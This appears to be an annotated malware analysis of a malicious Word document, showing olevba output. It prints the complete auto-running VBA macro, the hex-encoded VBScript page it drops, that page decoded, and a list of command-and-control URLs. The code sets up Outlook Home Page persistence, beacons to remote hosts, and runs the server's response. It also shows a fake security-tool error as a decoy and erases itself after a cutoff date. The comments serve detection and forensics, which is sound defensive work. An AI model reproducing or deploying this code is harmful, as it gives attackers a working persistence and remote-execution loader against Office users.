A very interesting DOCX no?
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools | |
=============================================================================== | |
FILE: 38bd9e647609d121621fc817ab2fdb5b58e9a2ac6c2f6640c36bc2164e7d54f1 | |
Type: OpenXML | |
------------------------------------------------------------------------------- | |
VBA MACRO ThisDocument.cls | |
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument' | |
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
' Win32 import: binds ExpandEnvironmentStringsA from kernel32 under the local name ExpandString.
' Document_Open calls it twice to expand the path string read from the "FL" document property.
' Triage note: a Declare into kernel32 inside a document macro is worth flagging on its own.
Private Declare PtrSafe Function ExpandString Lib "kernel32" Alias "ExpandEnvironmentStringsA" (ByVal lpSrc As String, ByVal lpDst As String, ByVal nSize As Long) As Long | |
' Auto-run entry point: Word calls Document_Open when the document is opened with macros enabled.
' In the visible code it (1) points the Outlook Inbox WebView "URL" registry value at a local file,
' (2) writes that file from hex held in a document property, (3) sends one HTTP GET to a URL taken
' from another property, and (4) shows a decoy error dialog before unhiding the "Page1" text.
' Detection: a write to HKCU\Software\Microsoft\Office\<version>\Outlook\WebView\<folder>\URL by an
' Office process, and Word instantiating Microsoft.Windows.ActCtx, are the observable events here
' (Outlook Home Page persistence, MITRE ATT&CK T1137.004).
Sub Document_Open() | |
' Every runtime error below is swallowed, so a failed step shows nothing to the user.
On Error Resume Next | |
' Registration-free activation: the inline manifest declares the .NET class
' Microsoft.VisualBasic.Devices.Computer so the ActCtx object can create it by ProgID.
Set ax = CreateObject("Microsoft.Windows.ActCtx") | |
m = "<?xml version=""1.0"" encoding=""UTF-16"" standalone=""yes""?><assembly xmlns=""urn:schemas-microsoft-com:asm.v1"" manifestVersion=""1.0"">" | |
m = m & "<assemblyIdentity name=""Microsoft.VisualBasic"" version=""10.0.0.0"" publicKeyToken=""B03F5F7F11D50A3A"" />" | |
m = m & "<clrClass clsid=""{E27D25D3-14B1-3960-8D23-A9FAB9BF32BC}"" progid=""Microsoft.VisualBasic.Devices.Computer"" threadingModel=""Both"" name=""Microsoft.VisualBasic.Devices.Computer"" runtimeVersion=""v4.0.30319"" /></assembly>" | |
ax.ManifestText = m | |
Set c = ax.CreateObject("Microsoft.VisualBasic.Devices.Computer") | |
' The registry key is opened through the .NET object's Registry.CurrentUser member.
' NOTE(review): the doubled backslashes are literal characters in VBA; confirm how the key path is
' normalised before relying on an exact-path match in a detection rule.
Set k = c.Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Office\\" + Application.Version + "\Outlook\WebView\Inbox") | |
Dim i As String, o As String, rs As Long | |
' "FL" is a document property holding the drop path; it is passed through
' ExpandEnvironmentStringsA, so it presumably contains environment-variable references.
i = R("FL") | |
' First call runs with rs = 0 and an empty buffer; its return value is kept as the buffer length.
rs = ExpandString(i, o, rs) | |
o = Space$(rs) | |
' Second call fills the allocated buffer with the expanded path.
rs = ExpandString(i, o, rs) | |
' The WebView "URL" value is set to a file:/// URL for the expanded path.
k.SetValue "URL", "file:///" & o | |
' The hex text in the "Hyperlink Base" property is decoded by DH and written to that path by WB.
WB o, DH(R("Hyperlink Base")) | |
' Synchronous GET (third argument False) to the URL stored in property "U". The response is not
' read in the visible code - presumably an "opened" notification; confirm from network telemetry.
Set oh = CreateObject("MSXML2.XMLHTTP") | |
oh.Open "GET", R("U"), False | |
oh.Send | |
' Decoy: a message box styled as a security-product error, shown after the actions above.
Dim Msg, Style, Title, Help, Ctxt, Response, MyString | |
Msg = "Error: FireEye DLP parsing failed." | |
Style = vbOKOnly | |
Title = "FireEye DLP" | |
Help = "DEMO.HLP" | |
Ctxt = 1000 | |
Response = MsgBox(Msg, Style, Title, Help, Ctxt) | |
' Unhide the text covered by the "Page1" bookmark; Document_Close hides it again.
ActiveDocument.Bookmarks("Page1").Range.Font.Hidden = False | |
End Sub | |
' Runs when the document is closed: hides the "Page1" bookmark text again and saves without a
' prompt. Presumably this returns the file on disk to its original lure state - confirm by
' comparing the document before and after one open/close cycle in a sandbox.
Private Sub Document_Close() | |
On Error Resume Next | |
ActiveDocument.Bookmarks("Page1").Range.Font.Hidden = True | |
Documents.Save NoPrompt:=True | |
End Sub | |
' Writes a byte array to disk through ADODB.Stream.
'   file  - destination path
'   bytes - binary content to write
' Errors are suppressed, so a failed write is silent.
' Detection: file creation by an Office process via ADODB.Stream is the event to look for.
Private Sub WB(file, bytes) | |
On Error Resume Next | |
Set s = CreateObject("ADODB.Stream") | |
' Type 1 is adTypeBinary.
s.Type = 1 | |
s.Open | |
s.Write bytes | |
' Option 2 is adSaveCreateOverWrite: an existing file at this path is replaced.
s.SaveToFile file, 2 | |
End Sub | |
' Hex decoder: uses an XML DOM element typed as "bin.hex" to convert a hex string to bytes.
'   hex - hexadecimal text
' Returns the element's nodeTypedValue for that text (the decoded binary value).
' Document_Open passes the "Hyperlink Base" property through this before writing it to disk.
Private Function DH(hex) | |
On Error Resume Next | |
Set EL = CreateObject("Microsoft.XMLDOM").createElement("tmp") | |
EL.dataType = "bin.hex" | |
EL.Text = hex | |
DH = EL.nodeTypedValue | |
End Function | |
' Reads a document property by name: built-in properties first, custom properties as a fallback.
'   sPropName - property name ("FL", "Hyperlink Base" and "U" are the names used in Document_Open)
' Returns the property value as a string, or "" when neither collection has the name.
' Triage note: the configuration and the embedded page live in document metadata, not in the macro
' text, so docProps/app.xml and docProps/custom.xml need to be inspected alongside the VBA.
Function R(sPropName As String) As Variant | |
' This handler is replaced three lines below by On Error GoTo ErrHandlerRead.
On Error Resume Next | |
Dim bCustom As Boolean | |
Dim sValue As String | |
On Error GoTo ErrHandlerRead | |
sValue = ActiveDocument.BuiltInDocumentProperties(sPropName).Value | |
R = sValue | |
Exit Function | |
' Reached through Resume from the error handler when the built-in lookup fails.
ContinueCustom: | |
bCustom = True | |
' This label is not referenced anywhere in the visible code.
Custom: | |
sValue = ActiveDocument.CustomDocumentProperties(sPropName).Value | |
R = sValue | |
Exit Function | |
ErrHandlerRead: | |
Err.Clear | |
' First failure: retry against the custom properties. Second failure: give up and return "".
If Not bCustom Then | |
Resume ContinueCustom | |
Else | |
R = "" | |
Exit Function | |
End If | |
End Function | |
############################################################################ | |
## in docProps/app.xml [tag={...}HyperlinkBase, text below: | |
## 3c68746d6c3e0a3c686561643e0a3c7469746c653e496e626f783c2f7469746c653e0a0a3c7363726970742069643d224576656e7448616e646c65727322206c616e67756167653d227662736372697074223e0a0a44696d20746d2c206964782c20646d2c2066742c20746b2c2065740a0a6574203d20313630313432383133350a746b203d20223938495445554644220a6674203d203330303030300a646d203d20417272617928223638303022262237343022262230373430303730303022262237333030332226226122262230222622303222262266302226223032662226223030372226223530303733222622303036343022262230362226223122262230222622303264302226223037303030366630303732303037222622343022262230222622363130222622303622262263303032653030222622363530303722262233222622303022262237322226223030363930303265303036332226223030366630303622262264303032222622663022262230362226223930302226223665302226223036222622343022262230363530222622303722262238222622302226223032652226223030373030303638303037303022262230222c2236222622383030222622373430303722262234222622302226223037222622303030373330303361302226223032663030222622326630303663302226223036393022262230363230222622302226223732302226223022262236312226223030373230303739303022262232653030366630222622303732303022262236222622353030362226223930303622262263303036633030222622373930303265303022262236333030362226226630303622262264302226223032663030362226223930303622262265303036342226223030222622363530303722262238302226223032222622653030372226223022262230222622303638303037303030222622222c22363830222622303734303037222622343030373030302226223733222622303033613030322226226630303266222622303036642226223030373930222622302226223638303037323022262230222622372226223030303622262263222622303036222622313022262230222622366522262230222622303265303036333030366630222622302226223664222622303032663022262230363930303665302226223036343030363530303738222622302226223032222622652226223030372226223022262230303622262238302226223037303030222c223638303022262237343022262230373430303730303037222622333030222622336130303266303032222622663030222622372226223030303666302226223022262236332
22622302226223022262232222622653030363630303734303037303030326430222622303622262265222622303036222622313030333230302226223265303036323030363122262230303722262239303036353030222622373230303222262265222622303036333030222622366630303664303032222622663030363930222622303622262265302226223022262236343030363530302226223738302226223032653022262230373030303638222622303022262237303030222c22363830303722262234222622303037343030222622373030303722262233303033222622613030326630303266303022262237222622333022262230363522262230222622303732303037363030362226223930222622303622262233303036222622352226223030372226223330303265303036633030222622373922262230303732302226223036222622393022262230222622372226223330303265303022262236333022262230222622366630222622303664303032663022262230362226223930222622303665303036343030362226223530222622303738303022262232653030373022262230302226223622262238303037303030222c223638303037343030372226223430302226223722262230303037333022262230336122262230222622303266303032663030372226226130303322262232222622302226223022262232652226223030222622362226223330303722262233302226223032652226223030366522262230303736303022262236393030362226223422262230303639222622303036312226223030362226223730303732222622302226223036392226223030363430303265303022262236653030222622362226223530302226223734222622303032663030363930303665303036222622343022262230363530302226223738303022262232653030373030303638303037303022262230222c22363830303734302226223037343030222622372226223030302226223733222622303022262233613022262230222622326630303266303036343030362226223530303736303037373022262230362226223530222622303622262232303022262232652226223022262230363130303733222622302226223036332226223022262230222622363322262230303222262265303022262236642226223022262230363522262230222622303266303022262236393022262230366522262230303634302226223036353030373830303222262265303037303030363830222622302226223730222622303022290a0a46756e6374696f6e2044482868290a202020204f6e204572726f7220526573756d65204e6578740a202020205365742
0454c203d205669657743746c312e4f75746c6f6f6b4170706c69636174696f6e2e4372656174654f626a65637428224d6963726f736f66742e584d4c444f4d22292e637265617465456c656d656e742822746d7022290a20202020454c2e6461746154797065203d202262696e2e686578220a20202020454c2e54657874203d20680a202020204448203d204353747228454c2e6e6f6465547970656456616c7565290a456e642046756e6374696f6e0a0a537562205428290a094f6e204572726f7220526573756d65204e6578740a0977696e646f772e636c65617254696d656f757428746d290a0a095365742064203d205669657743746c312e4f75746c6f6f6b4170706c69636174696f6e2e4372656174654f626a65637428224d53584d4c322e444f4d446f63756d656e7422290a0953657420686f203d205669657743746c312e4f75746c6f6f6b4170706c69636174696f6e2e4372656174654f626a65637428224d53584d4c322e584d4c4854545022290a0a20202020686f2e4f70656e2022474554222c2028444828646d286964782929202620223f746f6b656e3d22202620746b20262022267822292c2046616c73650a20202020686f2e53656e640a20202020642e4c6f6164584d4c20686f2e726573706f6e7365546578740a20202020642e7472616e73666f726d4e6f646520640a20202020496620642e70617273654572726f722e6572726f72436f6465203d2030205468656e0a202020200945786974205375620a20202020456e642049660a0a20202020496620696478203c2055426f756e6428646d29205468656e0a2020202009696478203d20696478202b20310a2020202009746d203d2077696e646f772e73657454696d656f7574282254222c2066742c2022564253637269707422290a20202020456e642049660a456e6420537562090a0a5375622057696e646f775f4f6e4c6f616428290a094f6e204572726f7220526573756d65204e6578740a0a09496620284461746544696666282273222c202230312f30312f313937302030303a30303a3030222c204e6f7729203e20657429205468656e0a0909536574206178203d205669657743746c312e4f75746c6f6f6b4170706c69636174696f6e2e4372656174654f626a65637428224d6963726f736f66742e57696e646f77732e41637443747822290a0a09096d203d20223c3f786d6c2076657273696f6e3d2222312e30222220656e636f64696e673d22225554462d31362222207374616e64616c6f6e653d222279657322223f3e3c617373656d626c7920786d6c6e733d222275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e76312222206d616e69666573745
6657273696f6e3d2222312e3022223e220a09096d203d206d202620223c617373656d626c794964656e74697479206e616d653d22224d6963726f736f66742e56697375616c426173696322222076657273696f6e3d222231302e302e302e302222207075626c69634b6579546f6b656e3d2222423033463546374631314435304133412222202f3e220a09096d203d206d202620223c636c72436c61737320636c7369643d22227b45323744323544332d313442312d333936302d384432332d4139464142394246333242437d22222070726f6769643d22224d6963726f736f66742e56697375616c42617369632e446576696365732e436f6d7075746572222220746872656164696e674d6f64656c3d2222426f74682222206e616d653d22224d6963726f736f66742e56697375616c42617369632e446576696365732e436f6d707574657222222072756e74696d6556657273696f6e3d222276342e302e33303331392222202f3e3c2f617373656d626c793e220a090961782e4d616e696665737454657874203d206d0a0a09095365742063203d2061782e4372656174654f626a65637428224d6963726f736f66742e56697375616c42617369632e446576696365732e436f6d707574657222290a0909536574206b203d20632e52656769737472792e43757272656e74557365722e4372656174655375624b65792822536f6674776172655c4d6963726f736f66745c4f66666963655c22202b204d6964285669657743746c312e4f75746c6f6f6b4170706c69636174696f6e2e56657273696f6e2c312c3429202b2020225c4f75746c6f6f6b5c576562566965775c496e626f7822290a090944696d20763a2076203d206b2e47657456616c7565282255524c22290a09096b2e44656c65746556616c7565202255524c220a09095669657743746c312e4f75746c6f6f6b4170706c69636174696f6e2e4372656174654f626a6563742822536372697074696e672e46696c6553797374656d4f626a65637422292e44656c65746546696c65284d696428762c203929290a090945786974205375620a09456e642049660a0a09746d203d2077696e646f772e73657454696d656f7574282254222c20353030302c2022564253637269707422290a456e64205375620a0a3c2f7363726970743e0a0a3c2f686561643e0a3c626f64793e0a3c6f626a65637420636c61737369643d22636c7369643a30303036463036332d303030302d303030302d433030302d303030303030303030303436222069643d225669657743746c312220646174613d22222077696474683d223130302522206865696768743d2231303025223e0a093c706172616d206e616d653d224e616d657370616
365222076616c75653d224d415049223e0a3c2f6f626a6563743e0a3c2f626f64793e0a3c2f68746d6c3e | |
################################################################################ | |
<html> | |
<head> | |
<title>Inbox</title> | |
<script id="EventHandlers" language="vbscript"> | |
' Script-level state and configuration for the page.
'   tm  - handle of the pending window timer
'   idx - index into dm; never assigned before first use, so it starts as Empty (treated as 0)
Dim tm, idx, dm, ft, tk, et | |
' Cut-off compared in Window_OnLoad against seconds elapsed since 01/01/1970 (computed from the
' local clock via Now). Read as Unix epoch seconds it is 2020-09-30 01:08:55.
et = 1601428135 | |
' Appended to every request as the "token" query parameter; a useful network indicator.
tk = "98ITEUFD" | |
' Delay in milliseconds (5 minutes) before the next entry in dm is tried.
ft = 300000 | |
' Each element is a hex string split into "&"-joined fragments, which defeats plain string matching
' on the page text. The bytes are UTF-16LE ("6800 7400 7400 7000" is "http"); the decoded values are
' listed at the end of this analysis.
dm = Array("6800"&"740"&"074007000"&"73003"&"a"&"0"&"02"&"f0"&"02f"&"007"&"50073"&"00640"&"06"&"1"&"0"&"02d0"&"070006f0072007"&"40"&"0"&"610"&"06"&"c002e00"&"65007"&"3"&"00"&"72"&"0069002e0063"&"006f006"&"d002"&"f0"&"06"&"900"&"6e0"&"06"&"40"&"0650"&"07"&"8"&"0"&"02e"&"0070006800700"&"0","6"&"800"&"74007"&"4"&"0"&"07"&"00073003a0"&"02f00"&"2f006c0"&"0690"&"0620"&"0"&"720"&"0"&"61"&"0072007900"&"2e006f0"&"07200"&"6"&"5006"&"9006"&"c006c00"&"79002e00"&"63006"&"f006"&"d0"&"02f006"&"9006"&"e0064"&"00"&"65007"&"80"&"02"&"e007"&"0"&"0"&"068007000"&"","680"&"074007"&"4007000"&"73"&"003a002"&"f002f"&"006d"&"00790"&"0"&"6800720"&"0"&"7"&"0006"&"c"&"006"&"10"&"0"&"6e"&"0"&"02e0063006f0"&"0"&"6d"&"002f0"&"069006e0"&"06400650078"&"0"&"02"&"e"&"007"&"0"&"006"&"80"&"07000","6800"&"740"&"0740070007"&"300"&"3a002f002"&"f00"&"7"&"0006f0"&"0"&"63"&"0"&"0"&"2"&"e006600740070002d0"&"06"&"e"&"006"&"1003200"&"2e00620061"&"007"&"9006500"&"72002"&"e"&"006300"&"6f006d002"&"f00690"&"06"&"e0"&"0"&"64006500"&"780"&"02e0"&"0700068"&"00"&"7000","68007"&"4"&"007400"&"70007"&"3003"&"a002f002f00"&"7"&"30"&"065"&"0"&"0720076006"&"90"&"06"&"3006"&"5"&"007"&"3002e006c00"&"79"&"00720"&"06"&"90"&"0"&"7"&"3002e00"&"630"&"0"&"6f0"&"06d002f0"&"06"&"90"&"06e0064006"&"50"&"07800"&"2e0070"&"00"&"6"&"8007000","680074007"&"400"&"7"&"000730"&"03a"&"0"&"02f002f007"&"a003"&"2"&"0"&"0"&"2e"&"00"&"6"&"3007"&"30"&"02e"&"006e"&"007600"&"69006"&"4"&"0069"&"0061"&"006"&"70072"&"0"&"069"&"0064002e00"&"6e00"&"6"&"500"&"74"&"002f0069006e006"&"40"&"06500"&"7800"&"2e0070006800700"&"0","6800740"&"07400"&"7"&"000"&"73"&"00"&"3a0"&"0"&"2f002f0064006"&"5007600770"&"06"&"50"&"06"&"200"&"2e"&"0"&"0610073"&"0"&"063"&"0"&"0"&"63"&"002"&"e00"&"6d"&"0"&"065"&"0"&"02f00"&"690"&"06e"&"00640"&"0650078002"&"e007000680"&"0"&"70"&"00") | |
' Hex decoder for the page: same "bin.hex" XML DOM conversion as the macro's DH, but the DOM
' object is created through ViewCtl1.OutlookApplication and the decoded value is converted with CStr.
'   h - hexadecimal text (an element of dm)
' Returns the decoded value as a string.
Function DH(h) | |
On Error Resume Next | |
Set EL = ViewCtl1.OutlookApplication.CreateObject("Microsoft.XMLDOM").createElement("tmp") | |
EL.dataType = "bin.hex" | |
EL.Text = h | |
DH = CStr(EL.nodeTypedValue) | |
End Function | |
' Timer callback: requests the current entry of dm and falls through to the next one on failure.
' Detection: periodic GET requests carrying "?token=" and "&x" in the query string, retried against
' a different host after the ft delay, are the network pattern this routine produces.
Sub T() | |
On Error Resume Next | |
window.clearTimeout(tm) | |
' Both COM objects are created through the Outlook application object exposed by ViewCtl1.
Set d = ViewCtl1.OutlookApplication.CreateObject("MSXML2.DOMDocument") | |
Set ho = ViewCtl1.OutlookApplication.CreateObject("MSXML2.XMLHTTP") | |
' Synchronous GET to the decoded URL with the token appended.
ho.Open "GET", (DH(dm(idx)) & "?token=" & tk & "&x"), False | |
ho.Send | |
' The response body is parsed as XML and then applied to itself as a stylesheet.
' NOTE(review): this is presumably where server-supplied content would take effect; the response
' is not on this page, so what it does cannot be stated from here.
d.LoadXML ho.responseText | |
d.transformNode d | |
' A clean parse ends the routine; no further timer is scheduled on this path.
If d.parseError.errorCode = 0 Then | |
Exit Sub | |
End If | |
' Otherwise advance to the next entry, if any, and retry after ft milliseconds.
If idx < UBound(dm) Then | |
idx = idx + 1 | |
tm = window.setTimeout("T", ft, "VBScript") | |
End If | |
End Sub | |
' Page load handler with a built-in expiry.
' After the cut-off in et it removes the WebView "URL" registry value and deletes the file that
' value pointed to, then stops. Before the cut-off it schedules T to run after 5 seconds.
' Forensics: on a host examined after the cut-off the registry value and the dropped file may
' already be gone, so absence of both does not rule out earlier activity.
Sub Window_OnLoad() | |
On Error Resume Next | |
' Seconds elapsed since 01/01/1970, taken from the local clock via Now, compared with et.
If (DateDiff("s", "01/01/1970 00:00:00", Now) > et) Then | |
' Same registration-free .NET activation as in the document macro.
Set ax = ViewCtl1.OutlookApplication.CreateObject("Microsoft.Windows.ActCtx") | |
m = "<?xml version=""1.0"" encoding=""UTF-16"" standalone=""yes""?><assembly xmlns=""urn:schemas-microsoft-com:asm.v1"" manifestVersion=""1.0"">" | |
m = m & "<assemblyIdentity name=""Microsoft.VisualBasic"" version=""10.0.0.0"" publicKeyToken=""B03F5F7F11D50A3A"" />" | |
m = m & "<clrClass clsid=""{E27D25D3-14B1-3960-8D23-A9FAB9BF32BC}"" progid=""Microsoft.VisualBasic.Devices.Computer"" threadingModel=""Both"" name=""Microsoft.VisualBasic.Devices.Computer"" runtimeVersion=""v4.0.30319"" /></assembly>" | |
ax.ManifestText = m | |
Set c = ax.CreateObject("Microsoft.VisualBasic.Devices.Computer") | |
' The key path is built from the first four characters of the Outlook version string.
Set k = c.Registry.CurrentUser.CreateSubKey("Software\Microsoft\Office\" + Mid(ViewCtl1.OutlookApplication.Version,1,4) + "\Outlook\WebView\Inbox") | |
Dim v: v = k.GetValue("URL") | |
k.DeleteValue "URL" | |
' Mid(v, 9) drops the first eight characters (the "file:///" prefix written by the macro),
' leaving the local path of the file to delete.
ViewCtl1.OutlookApplication.CreateObject("Scripting.FileSystemObject").DeleteFile(Mid(v, 9)) | |
Exit Sub | |
End If | |
tm = window.setTimeout("T", 5000, "VBScript") | |
End Sub | |
</script> | |
</head> | |
<body> | |
<!-- Embedded ActiveX control with id ViewCtl1 (this CLSID is the Outlook View Control), bound to
     the MAPI namespace. The script in the head section calls ViewCtl1.OutlookApplication.CreateObject
     through it to create every other COM object it uses. Detection: a locally stored HTML page
     that embeds this classid is worth flagging. -->
<object classid="clsid:0006F063-0000-0000-C000-000000000046" id="ViewCtl1" data="" width="100%" height="100%"> | |
<param name="Namespace" value="MAPI"> | |
</object> | |
</body> | |
</html> | |
############################################################################### | |
https://usda-portal.esri.com/index.php | |
https://library.oreilly.com/index.php | |
https://myhrplan.com/index.php | |
https://poc.ftp-na2.bayer.com/index.php | |
https://services.lyris.com/index.php | |
https://z2.cs.nvidiagrid.net/index.php | |
https://devweb.ascc.me/index.php |